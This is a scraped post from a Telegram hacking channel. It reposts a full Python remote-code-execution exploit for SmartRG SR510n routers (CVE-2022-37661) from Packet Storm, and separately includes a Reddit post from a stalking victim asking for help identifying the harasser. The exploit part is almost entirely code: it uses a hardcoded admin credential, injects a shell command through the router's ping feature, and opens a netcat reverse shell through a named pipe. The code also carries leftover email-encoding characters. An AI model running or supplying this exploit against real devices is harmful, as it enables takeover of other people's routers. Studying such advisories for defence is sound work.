Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
SmartRG Router SR510n 2.6.13 Remote Code Execution

https://3.bp.blogspot.com/-nGXsE6SnJzg/WWlu_4hmLPI/AAAAAAAAIKI/Orx5Bzmw2Dg1C2Ys8CQM09j0YgXq__7zgCLcBGAs/s1600/h120.png
SmartRG Router SR510n version 2.6.13 suffers from a remote code execution vulnerability.

SHA-256 | dba419bb745ff6282406231b1e06978a7526ccc1828d7e4bb7c0dee6d345cbe1

Download
# Exploit Title: SmartRG Router SR510n 2.6.13 - RCE (Remote Code Execution)
# Date: 13/06/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://adtran.com
# Version: 2.5.15 / 2.6.13 (confirmed)
# Tested on: SR506n (2.5.15) & SR510n (2.6.13)
# CVE : CVE-2022-37661

import requests
from subprocess import Popen, PIPE

router_host =3D "http://192.168.1.1"
authorization_header =3D "YWRtaW46QWRtMW5ATDFtMyM=3D"

lhost =3D "lo"
lport =3D 80

payload_port =3D 81
def main():
e_proc =3D Popen(["echo", f"rm /tmp/s & mknod /tmp/s p & /bin/sh 0< /tm=
p/s | nc {lhost} {lport} > /tmp/s"], stdout=3DPIPE)
Popen(["nc", "-nlvp", f"{payload_port}"], stdin=3De_proc.stdout)
send_payload(f"|nc {lhost} {payload_port}|sh")
print("done.. check shell")
def get_session():
url =3D router_host + "/admin/ping.html"
headers =3D {"Authorization": "Basic {}".format(authorization_header)}
r =3D requests.get(url, headers=3Dheaders).text
i =3D r.find("&sessionKey=3D") + len("&sessionKey=3D")
s =3D ""
while r[i] !=3D "'":
s =3D s + r[i]
i =3D i + 1
return s
def send_payload(payload):
print(payload)
url =3D router_host + "/admin/pingHost.cmd"
headers =3D {"Authorization": "Basic {}".format(authorization_header)}
params =3D {"action": "add", "targetHostAddress": payload, "sessionKey"=
: get_session()}
requests.get(url, headers=3Dheaders, params=3Dparams).text
main()


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
I’m at a loss. I have a stalker.

I have a phone number and nothing more to provide other than a few fake photos this person has sent me of different people they’ve tried being.

They call me from No Caller ID, so blocking them just isn’t an option. If I turn on to not accept unknown callers- I miss important callers like doctors appts, ect. So can’t do that.

They watch my business pages Instagram stories to see what I’m doing from a WEBSITE called StorySaver.net …lol. They admitted this to me. They changed their location to my town on dating profiles (tinder, hinge)

I need peace of mind. They have already found my home address and left a handwritten letter 4 years ago with no stamps- so they put it in my mailbox by hand..

Going back to the phone number- It is an iMessage number ( 909 Cali area code currently ) but everytime I trace it, I either can’t find anything on it OR some guy named Victor is attached to it but I have a feeling that he was the numbers previous Owner.

I feel as if this person has given me “hints” as to who they are, but it’s been 5 years. And I’m over it. At first I thought I could crack this case myself, but I can’t. Originally he had a PA area code (570) but sometime last year he changed it to a Cali one to throw me off maybe.

I have a few locations(states) they either potentially dwelled in and/or lived.

Can anyone give me hints or tips? I need to find out who this is. I have checked every single website that Google suggests when looking for someone attached to a phone number.

I have the selfies I can provide as well. That are obviously more than likely fake. Anything would be appreciated. I’m Kinda over being scared of this person. (Side note- I reverse searched the selfie images too…no luck) I am so god damn lost and over being harassed.

Also cops are useless in this manner. TIA

submitted by /u/ImageSea2916
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video